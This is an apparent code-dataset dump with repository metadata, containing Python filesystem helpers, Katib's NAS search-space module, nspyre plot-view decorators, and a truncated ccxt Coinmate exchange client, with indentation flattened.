for dirpath, subdirs, files in os.walk(root, topdown=False):
for f in files:
path = join_path(dirpath, f)
remove_if_dead_link(path)
def remove_if_dead_link(path):
if os.path.islink(path) and not os.path.exists(path):
os.unlink(path)
def remove_linked_tree(path):
if os.path.exists(path):
if os.path.islink(path):
shutil.rmtree(os.path.realpath(path), True)
os.unlink(path)
else:
shutil.rmtree(path, True)
def fix_darwin_install_name(path):
libs = glob.glob(join_path(path, "*.dylib"))
for lib in libs:
# fix install name first:
install_name_tool = Executable('install_name_tool')
install_name_tool('-id', lib, lib)
otool = Executable('otool')
long_deps = otool('-L', lib, output=str).split('\n')
deps = [dep.partition(' ')[0][1::] for dep in long_deps[2:-1]]
# fix all dependencies:
for dep in deps:
for loc in libs:
# We really want to check for either
# dep == os.path.basename(loc) or
# dep == join_path(builddir, os.path.basename(loc)),
                # but we don't know builddir (nor how symbolic links look
                # in builddir). We thus only compare the basenames.
if os.path.basename(dep) == os.path.basename(loc):
install_name_tool('-change', dep, loc, lib)
break
def find(root, files, recursive=True):
if isinstance(files, six.string_types):
files = [files]
if recursive:
return _find_recursive(root, files)
else:
return _find_non_recursive(root, files)
def _find_recursive(root, search_files):
found_files = collections.defaultdict(list)
root = os.path.abspath(root)
for path, _, list_files in os.walk(root):
for search_file in search_files:
matches = glob.glob(os.path.join(path, search_file))
matches = [os.path.join(path, x) for x in matches]
found_files[search_file].extend(matches)
answer = []
for search_file in search_files:
answer.extend(found_files[search_file])
return answer
def _find_non_recursive(root, search_files):
found_files = collections.defaultdict(list)
root = os.path.abspath(root)
for search_file in search_files:
matches = glob.glob(os.path.join(root, search_file))
matches = [os.path.join(root, x) for x in matches]
found_files[search_file].extend(matches)
answer = []
for search_file in search_files:
answer.extend(found_files[search_file])
return answer
class FileList(collections.Sequence):
def __init__(self, files):
if isinstance(files, six.string_types):
files = [files]
self.files = list(dedupe(files))
@property
def directories(self):
return list(dedupe(
os.path.dirname(x) for x in self.files if os.path.dirname(x)
))
@property
def basenames(self):
return list(dedupe(os.path.basename(x) for x in self.files))
def __getitem__(self, item):
cls = type(self)
if isinstance(item, numbers.Integral):
return self.files[item]
return cls(self.files[item])
def __add__(self, other):
return self.__class__(dedupe(self.files + list(other)))
def __radd__(self, other):
return self.__add__(other)
def __eq__(self, other):
return self.files == other.files
def __len__(self):
return len(self.files)
def joined(self, separator=' '):
return separator.join(self.files)
def __repr__(self):
return self.__class__.__name__ + '(' + repr(self.files) + ')'
def __str__(self):
return self.joined()
class HeaderList(FileList):
include_regex = re.compile(r'(.*?)(\binclude\b)(.*)')
def __init__(self, files):
super(HeaderList, self).__init__(files)
self._macro_definitions = []
self._directories = None
@property
def directories(self):
values = self._directories
if values is None:
values = self._default_directories()
return list(dedupe(values))
@directories.setter
def directories(self, value):
value = value or []
if isinstance(value, six.string_types):
value = [value]
self._directories = [os.path.normpath(x) for x in value]
def _default_directories(self):
dir_list = super(HeaderList, self).directories
values = []
for d in dir_list:
m = self.include_regex.match(d)
value = os.path.join(*m.group(1, 2)) if m else d
values.append(value)
return values
@property
def headers(self):
return self.files
@property
def names(self):
names = []
for x in self.basenames:
name = x
# Valid extensions include: ['.cuh', '.hpp', '.hh', '.h']
for ext in ['.cuh', '.hpp', '.hh', '.h']:
i = name.rfind(ext)
if i != -1:
names.append(name[:i])
break
else:
# No valid extension, should we still include it?
names.append(name)
return list(dedupe(names))
@property
def include_flags(self):
return ' '.join(['-I' + x for x in self.directories])
@property
def macro_definitions(self):
return ' '.join(self._macro_definitions)
@property
def cpp_flags(self):
cpp_flags = self.include_flags
if self.macro_definitions:
cpp_flags += ' ' + self.macro_definitions
return cpp_flags
def add_macro(self, macro):
self._macro_definitions.append(macro)
def find_headers(headers, root, recursive=False):
if isinstance(headers, six.string_types):
headers = [headers]
elif not isinstance(headers, collections.Sequence):
message = '{0} expects a string or sequence of strings as the '
message += 'first argument [got {1} instead]'
message = message.format(find_headers.__name__, type(headers))
raise TypeError(message)
# Construct the right suffix for the headers
suffixes = [
# C
'h',
# C++
'hpp', 'hxx', 'hh', 'H', 'txx', 'tcc', 'icc',
# Fortran
'mod', 'inc',
]
# List of headers we are searching with suffixes
headers = ['{0}.{1}'.format(header, suffix) for header in headers
for suffix in suffixes]
return HeaderList(find(root, headers, recursive))
def find_all_headers(root):
return find_headers('*', root=root, recursive=True)
class LibraryList(FileList):
@property
def libraries(self):
return self.files
@property
def names(self):
names = []
for x in self.basenames:
name = x
if x.startswith('lib'):
name = x[3:]
# Valid extensions include: ['.dylib', '.so', '.a']
for ext in ['.dylib', '.so', '.a']:
i = name.rfind(ext)
if i != -1:
names.append(name[:i])
break
else:
# No valid extension, should we still include it?
names.append(name)
return list(dedupe(names))
@property
def search_flags(self):
return ' '.join(['-L' + x for x in self.directories])
@property
def link_flags(self):
return ' '.join(['-l' + name for name in self.names])
@property
def ld_flags(self):
return self.search_flags + ' ' + self.link_flags
def find_system_libraries(libraries, shared=True):
if isinstance(libraries, six.string_types):
libraries = [libraries]
elif not isinstance(libraries, collections.Sequence):
message = '{0} expects a string or sequence of strings as the '
message += 'first argument [got {1} instead]'
message = message.format(find_system_libraries.__name__,
type(libraries))
raise TypeError(message)
libraries_found = []
search_locations = [
'/lib64',
'/lib',
'/usr/lib64',
'/usr/lib',
'/usr/local/lib64',
'/usr/local/lib',
]
for library in libraries:
for root in search_locations:
result = find_libraries(library, root, shared, recursive=True)
if result:
libraries_found += result
break
return libraries_found
def find_libraries(libraries, root, shared=True, recursive=False):
if isinstance(libraries, six.string_types):
libraries = [libraries]
elif not isinstance(libraries, collections.Sequence):
message = '{0} expects a string or sequence of strings as the '
message += 'first argument [got {1} instead]'
message = message.format(find_libraries.__name__, type(libraries))
raise TypeError(message)
# Construct the right suffix for the library
if shared is True:
suffix = 'dylib' if sys.platform == 'darwin' else 'so'
else:
suffix = 'a'
# List of libraries we are searching with suffixes
libraries = ['{0}.{1}'.format(lib, suffix) for lib in libraries]
if not recursive:
# If not recursive, look for the libraries directly in root
return LibraryList(find(root, libraries, False))
# To speedup the search for external packages configured e.g. in /usr,
# perform first non-recursive search in root/lib then in root/lib64 and
# finally search all of root recursively. The search stops when the first
# match is found.
for subdir in ('lib', 'lib64'):
dirname = join_path(root, subdir)
if not os.path.isdir(dirname):
continue
found_libs = find(dirname, libraries, False)
if found_libs:
break
else:
found_libs = find(root, libraries, True)
return LibraryList(found_libs)
@memoized
def can_access_dir(path):
return os.path.isdir(path) and os.access(path, os.R_OK | os.X_OK)
@memoized
def can_write_to_dir(path):
return os.path.isdir(path) and os.access(path, os.R_OK | os.X_OK | os.W_OK)
@memoized
def files_in(*search_paths):
files = []
for d in filter(can_access_dir, search_paths):
files.extend(filter(
lambda x: os.path.isfile(x[1]),
[(f, os.path.join(d, f)) for f in os.listdir(d)]
))
return files
def search_paths_for_executables(*path_hints):
executable_paths = []
for path in path_hints:
if not os.path.isdir(path):
continue
path = os.path.abspath(path)
executable_paths.append(path)
bin_dir = os.path.join(path, 'bin')
if os.path.isdir(bin_dir):
executable_paths.append(bin_dir)
return executable_paths
def partition_path(path, entry=None):
paths = prefixes(path)
if entry is not None:
        # Derive the index of entry within paths, which will correspond to
        # the location of the entry within the path.
try:
entries = path.split(os.sep)
i = entries.index(entry)
if '' in entries:
i -= 1
return paths[:i], paths[i], paths[i + 1:]
except ValueError:
pass
return paths, '', []
def prefixes(path):
if not path:
return []
parts = path.strip(os.sep).split(os.sep)
if path.startswith(os.sep):
parts.insert(0, os.sep)
paths = [os.path.join(*parts[:i + 1]) for i in range(len(parts))]
try:
paths.remove(os.sep)
except ValueError:
pass
try:
paths.remove('.')
except ValueError:
pass
return paths
def md5sum(file):
md5 = hashlib.md5()
with open(file, "rb") as f:
md5.update(f.read())
return md5.digest()
def remove_directory_contents(dir):
if os.path.exists(dir):
for entry in [os.path.join(dir, entry) for entry in os.listdir(dir)]:
if os.path.isfile(entry) or os.path.islink(entry):
os.unlink(entry)
else:
shutil.rmtree(entry)
| true
| true
|
1c44735ee29ae80ebb1e9d736322620b52449d80
| 3,087
|
py
|
Python
|
pkg/suggestion/v1alpha1/NAS_Reinforcement_Learning/Operation.py
|
terrytangyuan/katib
|
5a7a144a1b33e05466174edd721803349622aabc
|
[
"Apache-2.0"
] | 6
|
2019-04-26T05:24:45.000Z
|
2020-03-16T15:54:23.000Z
|
pkg/suggestion/v1alpha1/NAS_Reinforcement_Learning/Operation.py
|
terrytangyuan/katib
|
5a7a144a1b33e05466174edd721803349622aabc
|
[
"Apache-2.0"
] | 30
|
2019-04-27T01:49:00.000Z
|
2021-02-01T08:52:32.000Z
|
pkg/suggestion/v1alpha1/NAS_Reinforcement_Learning/Operation.py
|
terrytangyuan/katib
|
5a7a144a1b33e05466174edd721803349622aabc
|
[
"Apache-2.0"
] | 4
|
2019-05-07T04:53:07.000Z
|
2020-10-21T09:10:26.000Z
|
import itertools
import numpy as np
from pkg.api.v1alpha1.python import api_pb2
class Operation(object):
def __init__(self, opt_id, opt_type, opt_params):
self.opt_id = opt_id
self.opt_type = opt_type
self.opt_params = opt_params
def get_dict(self):
opt_dict = dict()
opt_dict['opt_id'] = self.opt_id
opt_dict['opt_type'] = self.opt_type
opt_dict['opt_params'] = self.opt_params
return opt_dict
def print_op(self, logger):
logger.info("Operation ID: \n\t{}".format(self.opt_id))
logger.info("Operation Type: \n\t{}".format(self.opt_type))
logger.info("Operations Parameters:")
for ikey in self.opt_params:
logger.info("\t{}: {}".format(ikey, self.opt_params[ikey]))
logger.info("")
class SearchSpace(object):
def __init__(self, operations):
self.operation_list = list(operations.operation)
self.search_space = list()
self._parse_operations()
print()
self.num_operations = len(self.search_space)
def _parse_operations(self):
        # search_space is a list of Operation objects
operation_id = 0
for operation_dict in self.operation_list:
opt_type = operation_dict.operationType
opt_spec = list(operation_dict.parameter_configs.configs)
            # avail_space is a dict with the format {"spec_name": [spec feasible values]}
avail_space = dict()
num_spec = len(opt_spec)
for ispec in opt_spec:
spec_name = ispec.name
if ispec.parameter_type == api_pb2.CATEGORICAL:
avail_space[spec_name] = list(ispec.feasible.list)
elif ispec.parameter_type == api_pb2.INT:
spec_min = int(ispec.feasible.min)
spec_max = int(ispec.feasible.max)
spec_step = int(ispec.feasible.step)
avail_space[spec_name] = range(spec_min, spec_max+1, spec_step)
elif ispec.parameter_type == api_pb2.DOUBLE:
spec_min = float(ispec.feasible.min)
spec_max = float(ispec.feasible.max)
spec_step = float(ispec.feasible.step)
double_list = np.arange(spec_min, spec_max+spec_step, spec_step)
                    if double_list[-1] > spec_max:
                        # np.arange can overshoot spec_max; trim the last
                        # element (`del` is not valid on an ndarray element)
                        double_list = double_list[:-1]
avail_space[spec_name] = double_list
# generate all the combinations of possible operations
key_avail_space = list(avail_space.keys())
val_avail_space = list(avail_space.values())
for this_opt_vector in itertools.product(*val_avail_space):
opt_params = dict()
for i in range(num_spec):
opt_params[key_avail_space[i]] = this_opt_vector[i]
this_opt_class = Operation(operation_id, opt_type, opt_params)
self.search_space.append(this_opt_class)
operation_id += 1
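# Standalone sketch of the grid expansion performed above: a hypothetical
# space {'filter_size': [3, 5], 'num_filter': [32]} expands to
# [{'filter_size': 3, 'num_filter': 32}, {'filter_size': 5, 'num_filter': 32}].
def _demo_expand(avail_space):
    keys, vals = list(avail_space.keys()), list(avail_space.values())
    return [dict(zip(keys, combo)) for combo in itertools.product(*vals)]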
| 40.090909
| 86
| 0.597344
|
import itertools
import numpy as np
from pkg.api.v1alpha1.python import api_pb2
class Operation(object):
def __init__(self, opt_id, opt_type, opt_params):
self.opt_id = opt_id
self.opt_type = opt_type
self.opt_params = opt_params
def get_dict(self):
opt_dict = dict()
opt_dict['opt_id'] = self.opt_id
opt_dict['opt_type'] = self.opt_type
opt_dict['opt_params'] = self.opt_params
return opt_dict
def print_op(self, logger):
logger.info("Operation ID: \n\t{}".format(self.opt_id))
logger.info("Operation Type: \n\t{}".format(self.opt_type))
logger.info("Operations Parameters:")
for ikey in self.opt_params:
logger.info("\t{}: {}".format(ikey, self.opt_params[ikey]))
logger.info("")
class SearchSpace(object):
def __init__(self, operations):
self.operation_list = list(operations.operation)
self.search_space = list()
self._parse_operations()
print()
self.num_operations = len(self.search_space)
def _parse_operations(self):
operation_id = 0
for operation_dict in self.operation_list:
opt_type = operation_dict.operationType
opt_spec = list(operation_dict.parameter_configs.configs)
avail_space = dict()
num_spec = len(opt_spec)
for ispec in opt_spec:
spec_name = ispec.name
if ispec.parameter_type == api_pb2.CATEGORICAL:
avail_space[spec_name] = list(ispec.feasible.list)
elif ispec.parameter_type == api_pb2.INT:
spec_min = int(ispec.feasible.min)
spec_max = int(ispec.feasible.max)
spec_step = int(ispec.feasible.step)
avail_space[spec_name] = range(spec_min, spec_max+1, spec_step)
elif ispec.parameter_type == api_pb2.DOUBLE:
spec_min = float(ispec.feasible.min)
spec_max = float(ispec.feasible.max)
spec_step = float(ispec.feasible.step)
double_list = np.arange(spec_min, spec_max+spec_step, spec_step)
                    if double_list[-1] > spec_max:
                        double_list = double_list[:-1]
avail_space[spec_name] = double_list
key_avail_space = list(avail_space.keys())
val_avail_space = list(avail_space.values())
for this_opt_vector in itertools.product(*val_avail_space):
opt_params = dict()
for i in range(num_spec):
opt_params[key_avail_space[i]] = this_opt_vector[i]
this_opt_class = Operation(operation_id, opt_type, opt_params)
self.search_space.append(this_opt_class)
operation_id += 1
| true
| true
|
1c4473c0e901afb9b524c273d6a5357d7d60c679
| 2,825
|
py
|
Python
|
src/nspyre/gui/widgets/views.py
|
AlexBourassa/nspyre
|
d254af09c7c8377552e85dba6f60b150fbb8da2e
|
[
"MIT"
] | 8
|
2019-12-06T14:49:34.000Z
|
2020-07-03T18:46:45.000Z
|
src/nspyre/gui/widgets/views.py
|
nspyre-org/nspyre
|
d254af09c7c8377552e85dba6f60b150fbb8da2e
|
[
"BSD-3-Clause"
] | 31
|
2020-09-21T21:01:06.000Z
|
2021-12-10T03:27:26.000Z
|
src/nspyre/gui/widgets/views.py
|
NSpyre-Dev/nspyre
|
d254af09c7c8377552e85dba6f60b150fbb8da2e
|
[
"BSD-3-Clause"
] | 4
|
2020-10-07T23:58:13.000Z
|
2022-03-01T15:22:34.000Z
|
class View:
"""Some Views for plotting."""
def __init__(self, f, plot_type):
self.update_fun = f
self.type = plot_type
self.init_formatters = dict()
self.update_formatters = dict()
def add_formatter(self, formatter):
if formatter.type == 'init':
self.init_formatters[formatter.handled_class] = formatter.format_fun
elif formatter.type == 'update':
self.update_formatters[formatter.handled_class] = formatter.format_fun
def get_formatter(self, plot, formatter_type):
formatters = self.init_formatters if formatter_type == 'init' else self.update_formatters
for c in formatters:
if issubclass(type(plot), c):
return formatters[c]
class Formatter:
def __init__(self, f, formatter_type, handled_class, view_list):
self.format_fun = f
self.type = formatter_type
self.handled_class = handled_class
self.view_list = view_list
def Plot1D(fun):
"""Functions marked with this decorators should take a single argument (beyond self) which will be the dataframe representing the data
The function marked must return a dict with the following format {'trace_name_1':[x1, y1], 'trace_name_2':[x2, y2], ...}"""
return View(fun, '1D')
def Plot2D(fun):
"""Functions marked with this decorators should take a single argument (beyond self) which will be the dataframe representing the data
The function marked must return a 2D ndarray to be plotted"""
return View(fun, '2D')
def PlotFormatInit(class_type_handled, view_list):
"""Functions marked with this decorators will be called once when initializing the views.
They should declare in the decorators argument what type of class they will handle.
For example, if a function wants to do some extra formatting on any subclass of BasePlotWidget from nspyre.widgets.plotting then:
@Plot1D()
def my_plot(self, df):
return {'trace1':[df.x.values, df.y1.values], 'trace2':[df.x.values, df.y2.values]}
@PlotFormat(BasePlotWidget, ['my_plot'])
def my_formating_function(self, plot):
plot.xlabel = 'x axis (in a.u.)'
There can only be one one PlotFormatInit function associated with a given plotting function
"""
def PlotFormatInit_Decorator(fun):
return Formatter(fun, 'init', class_type_handled, view_list)
return PlotFormatInit_Decorator
def PlotFormatUpdate(class_type_handled, view_list):
"""Same idea as PlotFormatUpdate, but functions marked with this decorators will be called every time the plot is updated."""
def PlotFormatUpdate_Decorator(fun):
return Formatter(fun, 'update', class_type_handled, view_list)
return PlotFormatUpdate_Decorator
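# Hypothetical usage sketch (not from the original module) tying the pieces
# together. 'BasePlotWidget' is the class named in the PlotFormatInit docstring
# and is assumed here to be importable from nspyre's plotting widgets:
#
# @Plot1D
# def my_plot(self, df):
#     return {'trace1': [df.x.values, df.y1.values]}
#
# @PlotFormatUpdate(BasePlotWidget, ['my_plot'])
# def refresh_labels(self, plot):
#     # runs on every update, unlike an 'init' formatter which runs once
#     plot.xlabel = 'x axis (in a.u.)'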
| 41.544118
| 138
| 0.692389
|
class View:
def __init__(self, f, plot_type):
self.update_fun = f
self.type = plot_type
self.init_formatters = dict()
self.update_formatters = dict()
def add_formatter(self, formatter):
if formatter.type == 'init':
self.init_formatters[formatter.handled_class] = formatter.format_fun
elif formatter.type == 'update':
self.update_formatters[formatter.handled_class] = formatter.format_fun
def get_formatter(self, plot, formatter_type):
formatters = self.init_formatters if formatter_type == 'init' else self.update_formatters
for c in formatters:
if issubclass(type(plot), c):
return formatters[c]
class Formatter:
def __init__(self, f, formatter_type, handled_class, view_list):
self.format_fun = f
self.type = formatter_type
self.handled_class = handled_class
self.view_list = view_list
def Plot1D(fun):
return View(fun, '1D')
def Plot2D(fun):
return View(fun, '2D')
def PlotFormatInit(class_type_handled, view_list):
def PlotFormatInit_Decorator(fun):
return Formatter(fun, 'init', class_type_handled, view_list)
return PlotFormatInit_Decorator
def PlotFormatUpdate(class_type_handled, view_list):
def PlotFormatUpdate_Decorator(fun):
return Formatter(fun, 'update', class_type_handled, view_list)
return PlotFormatUpdate_Decorator
| true
| true
|
1c4473f0c25ec1b733d34e3f0547784dd273bf3a
| 38,712
|
py
|
Python
|
python/ccxt/coinmate.py
|
Dan-krm/ccxt
|
2ed8b7b8598e2934559822d81a8d14885b4d4ad3
|
[
"MIT"
] | null | null | null |
python/ccxt/coinmate.py
|
Dan-krm/ccxt
|
2ed8b7b8598e2934559822d81a8d14885b4d4ad3
|
[
"MIT"
] | null | null | null |
python/ccxt/coinmate.py
|
Dan-krm/ccxt
|
2ed8b7b8598e2934559822d81a8d14885b4d4ad3
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.base.exchange import Exchange
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
from ccxt.base.errors import RateLimitExceeded
from ccxt.base.decimal_to_precision import TICK_SIZE
from ccxt.base.precise import Precise
class coinmate(Exchange):
def describe(self):
return self.deep_extend(super(coinmate, self).describe(), {
'id': 'coinmate',
'name': 'CoinMate',
'countries': ['GB', 'CZ', 'EU'], # UK, Czech Republic
'rateLimit': 1000,
'has': {
'CORS': True,
'spot': True,
'margin': False,
'swap': False,
'future': False,
'option': False,
'addMargin': False,
'cancelOrder': True,
'createOrder': True,
'createReduceOnlyOrder': False,
'fetchBalance': True,
'fetchBorrowRate': False,
'fetchBorrowRateHistories': False,
'fetchBorrowRateHistory': False,
'fetchBorrowRates': False,
'fetchBorrowRatesPerSymbol': False,
'fetchFundingHistory': False,
'fetchFundingRate': False,
'fetchFundingRateHistory': False,
'fetchFundingRates': False,
'fetchIndexOHLCV': False,
'fetchLeverage': False,
'fetchLeverageTiers': False,
'fetchMarkets': True,
'fetchMarkOHLCV': False,
'fetchMyTrades': True,
'fetchOpenInterestHistory': False,
'fetchOpenOrders': True,
'fetchOrder': True,
'fetchOrderBook': True,
'fetchOrders': True,
'fetchPosition': False,
'fetchPositions': False,
'fetchPositionsRisk': False,
'fetchPremiumIndexOHLCV': False,
'fetchTicker': True,
'fetchTrades': True,
'fetchTradingFee': True,
'fetchTradingFees': False,
'fetchTransactions': True,
'reduceMargin': False,
'setLeverage': False,
'setMarginMode': False,
'setPositionMode': False,
'transfer': False,
'withdraw': True,
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/51840849/87460806-1c9f3f00-c616-11ea-8c46-a77018a8f3f4.jpg',
'api': 'https://coinmate.io/api',
'www': 'https://coinmate.io',
'fees': 'https://coinmate.io/fees',
'doc': [
'https://coinmate.docs.apiary.io',
'https://coinmate.io/developers',
],
'referral': 'https://coinmate.io?referral=YTFkM1RsOWFObVpmY1ZjMGREQmpTRnBsWjJJNVp3PT0',
},
'requiredCredentials': {
'apiKey': True,
'secret': True,
'uid': True,
},
'api': {
'public': {
'get': [
'orderBook',
'ticker',
'transactions',
'tradingPairs',
],
},
'private': {
'post': [
'balances',
'bitcoinCashWithdrawal',
'bitcoinCashDepositAddresses',
'bitcoinDepositAddresses',
'bitcoinWithdrawal',
'bitcoinWithdrawalFees',
'buyInstant',
'buyLimit',
'cancelOrder',
'cancelOrderWithInfo',
'createVoucher',
'dashDepositAddresses',
'dashWithdrawal',
'ethereumWithdrawal',
'ethereumDepositAddresses',
'litecoinWithdrawal',
'litecoinDepositAddresses',
'openOrders',
'order',
'orderHistory',
'orderById',
'pusherAuth',
'redeemVoucher',
'replaceByBuyLimit',
'replaceByBuyInstant',
'replaceBySellLimit',
'replaceBySellInstant',
'rippleDepositAddresses',
'rippleWithdrawal',
'sellInstant',
'sellLimit',
'transactionHistory',
'traderFees',
'tradeHistory',
'transfer',
'transferHistory',
'unconfirmedBitcoinDeposits',
'unconfirmedBitcoinCashDeposits',
'unconfirmedDashDeposits',
'unconfirmedEthereumDeposits',
'unconfirmedLitecoinDeposits',
'unconfirmedRippleDeposits',
],
},
},
'fees': {
'trading': {
'tierBased': True,
'percentage': True,
'maker': 0.12 / 100,
'taker': 0.25 / 100,
'tiers': {
'taker': [
[self.parse_number('0'), self.parse_number('0.0035')],
[self.parse_number('10000'), self.parse_number('0.0023')],
[self.parse_number('100000'), self.parse_number('0.0021')],
[self.parse_number('250000'), self.parse_number('0.0020')],
[self.parse_number('500000'), self.parse_number('0.0015')],
[self.parse_number('1000000'), self.parse_number('0.0013')],
[self.parse_number('3000000'), self.parse_number('0.0010')],
[self.parse_number('15000000'), self.parse_number('0.0005')],
],
'maker': [
[self.parse_number('0'), self.parse_number('0.003')],
[self.parse_number('10000'), self.parse_number('0.0011')],
[self.parse_number('100000'), self.parse_number('0.0010')],
[self.parse_number('250000'), self.parse_number('0.0008')],
[self.parse_number('500000'), self.parse_number('0.0005')],
[self.parse_number('1000000'), self.parse_number('0.0003')],
[self.parse_number('3000000'), self.parse_number('0.0002')],
[self.parse_number('15000000'), self.parse_number('0')],
],
},
},
},
'options': {
'withdraw': {
                    'fillResponseFromRequest': True,
'methods': {
'BTC': 'privatePostBitcoinWithdrawal',
'LTC': 'privatePostLitecoinWithdrawal',
'BCH': 'privatePostBitcoinCashWithdrawal',
'ETH': 'privatePostEthereumWithdrawal',
'XRP': 'privatePostRippleWithdrawal',
'DASH': 'privatePostDashWithdrawal',
'DAI': 'privatePostDaiWithdrawal',
},
},
},
'exceptions': {
'exact': {
'No order with given ID': OrderNotFound,
},
'broad': {
'Not enough account balance available': InsufficientFunds,
'Incorrect order ID': InvalidOrder,
'Minimum Order Size ': InvalidOrder,
'TOO MANY REQUESTS': RateLimitExceeded,
'Access denied.': AuthenticationError, # {"error":true,"errorMessage":"Access denied.","data":null}
},
},
'precisionMode': TICK_SIZE,
})
def fetch_markets(self, params={}):
"""
retrieves data on all markets for coinmate
:param dict params: extra parameters specific to the exchange api endpoint
:returns [dict]: an array of objects representing market data
"""
response = self.publicGetTradingPairs(params)
#
# {
# "error":false,
# "errorMessage":null,
# "data": [
# {
# "name":"BTC_EUR",
# "firstCurrency":"BTC",
# "secondCurrency":"EUR",
# "priceDecimals":2,
# "lotDecimals":8,
# "minAmount":0.0002,
# "tradesWebSocketChannelId":"trades-BTC_EUR",
# "orderBookWebSocketChannelId":"order_book-BTC_EUR",
# "tradeStatisticsWebSocketChannelId":"statistics-BTC_EUR"
# },
# ]
# }
#
data = self.safe_value(response, 'data', [])
result = []
for i in range(0, len(data)):
market = data[i]
id = self.safe_string(market, 'name')
baseId = self.safe_string(market, 'firstCurrency')
quoteId = self.safe_string(market, 'secondCurrency')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'settle': None,
'baseId': baseId,
'quoteId': quoteId,
'settleId': None,
'type': 'spot',
'spot': True,
'margin': False,
'swap': False,
'future': False,
'option': False,
'active': None,
'contract': False,
'linear': None,
'inverse': None,
'contractSize': None,
'expiry': None,
'expiryDatetime': None,
'strike': None,
'optionType': None,
'precision': {
'amount': self.parse_number(self.parse_precision(self.safe_string(market, 'lotDecimals'))),
'price': self.parse_number(self.parse_precision(self.safe_string(market, 'priceDecimals'))),
},
'limits': {
'leverage': {
'min': None,
'max': None,
},
'amount': {
'min': self.safe_number(market, 'minAmount'),
'max': None,
},
'price': {
'min': None,
'max': None,
},
'cost': {
'min': None,
'max': None,
},
},
'info': market,
})
return result
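    # Worked example (illustrative, not in the original source): under the
    # TICK_SIZE precision mode declared in describe(), parse_precision turns a
    # decimal-places count into a tick size, so a market reporting
    # "lotDecimals": 8 and "priceDecimals": 2 ends up with
    #   precision == {'amount': 1e-08, 'price': 0.01}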
def parse_balance(self, response):
balances = self.safe_value(response, 'data', {})
result = {'info': response}
currencyIds = list(balances.keys())
for i in range(0, len(currencyIds)):
currencyId = currencyIds[i]
code = self.safe_currency_code(currencyId)
balance = self.safe_value(balances, currencyId)
account = self.account()
account['free'] = self.safe_string(balance, 'available')
account['used'] = self.safe_string(balance, 'reserved')
account['total'] = self.safe_string(balance, 'balance')
result[code] = account
return self.safe_balance(result)
def fetch_balance(self, params={}):
"""
query for balance and get the amount of funds available for trading or funds locked in orders
:param dict params: extra parameters specific to the coinmate api endpoint
:returns dict: a `balance structure <https://docs.ccxt.com/en/latest/manual.html?#balance-structure>`
"""
self.load_markets()
response = self.privatePostBalances(params)
return self.parse_balance(response)
def fetch_order_book(self, symbol, limit=None, params={}):
"""
fetches information on open orders with bid(buy) and ask(sell) prices, volumes and other data
:param str symbol: unified symbol of the market to fetch the order book for
:param int|None limit: the maximum amount of order book entries to return
:param dict params: extra parameters specific to the coinmate api endpoint
:returns dict: A dictionary of `order book structures <https://docs.ccxt.com/en/latest/manual.html#order-book-structure>` indexed by market symbols
"""
self.load_markets()
request = {
'currencyPair': self.market_id(symbol),
'groupByPriceLimit': 'False',
}
response = self.publicGetOrderBook(self.extend(request, params))
orderbook = response['data']
timestamp = self.safe_timestamp(orderbook, 'timestamp')
return self.parse_order_book(orderbook, symbol, timestamp, 'bids', 'asks', 'price', 'amount')
def fetch_ticker(self, symbol, params={}):
"""
fetches a price ticker, a statistical calculation with the information calculated over the past 24 hours for a specific market
:param str symbol: unified symbol of the market to fetch the ticker for
:param dict params: extra parameters specific to the coinmate api endpoint
:returns dict: a `ticker structure <https://docs.ccxt.com/en/latest/manual.html#ticker-structure>`
"""
self.load_markets()
request = {
'currencyPair': self.market_id(symbol),
}
response = self.publicGetTicker(self.extend(request, params))
ticker = self.safe_value(response, 'data')
timestamp = self.safe_timestamp(ticker, 'timestamp')
last = self.safe_number(ticker, 'last')
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_number(ticker, 'high'),
'low': self.safe_number(ticker, 'low'),
'bid': self.safe_number(ticker, 'bid'),
'bidVolume': None,
'ask': self.safe_number(ticker, 'ask'),
'vwap': None,
'askVolume': None,
'open': None,
'close': last,
'last': last,
'previousClose': None,
'change': None,
'percentage': None,
'average': None,
'baseVolume': self.safe_number(ticker, 'amount'),
'quoteVolume': None,
'info': ticker,
}
def fetch_transactions(self, code=None, since=None, limit=None, params={}):
"""
fetch history of deposits and withdrawals
:param str|None code: unified currency code for the currency of the transactions, default is None
:param int|None since: timestamp in ms of the earliest transaction, default is None
:param int|None limit: max number of transactions to return, default is None
:param dict params: extra parameters specific to the coinmate api endpoint
:returns dict: a list of `transaction structure <https://docs.ccxt.com/en/latest/manual.html#transaction-structure>`
"""
self.load_markets()
request = {
'limit': 1000,
}
if limit is not None:
request['limit'] = limit
if since is not None:
request['timestampFrom'] = since
if code is not None:
currency = self.currency(code)
request['currency'] = currency['id']
response = self.privatePostTransferHistory(self.extend(request, params))
items = response['data']
return self.parse_transactions(items, None, since, limit)
def parse_transaction_status(self, status):
statuses = {
'COMPLETED': 'ok',
'WAITING': 'pending',
'SENT': 'pending',
'CREATED': 'pending',
'OK': 'ok',
'NEW': 'pending',
'CANCELED': 'canceled',
}
return self.safe_string(statuses, status, status)
def parse_transaction(self, transaction, currency=None):
#
# deposits
#
# {
# transactionId: 1862815,
# timestamp: 1516803982388,
# amountCurrency: 'LTC',
# amount: 1,
# fee: 0,
# walletType: 'LTC',
# transferType: 'DEPOSIT',
# transferStatus: 'COMPLETED',
# txid:
# 'ccb9255dfa874e6c28f1a64179769164025329d65e5201849c2400abd6bce245',
# destination: 'LQrtSKA6LnhcwRrEuiborQJnjFF56xqsFn',
# destinationTag: null
# }
#
# withdrawals
#
# {
# transactionId: 2140966,
# timestamp: 1519314282976,
# amountCurrency: 'EUR',
# amount: 8421.7228,
# fee: 16.8772,
# walletType: 'BANK_WIRE',
# transferType: 'WITHDRAWAL',
# transferStatus: 'COMPLETED',
# txid: null,
# destination: null,
# destinationTag: null
# }
#
# withdraw
#
# {
# "id": 2132583,
# }
#
timestamp = self.safe_integer(transaction, 'timestamp')
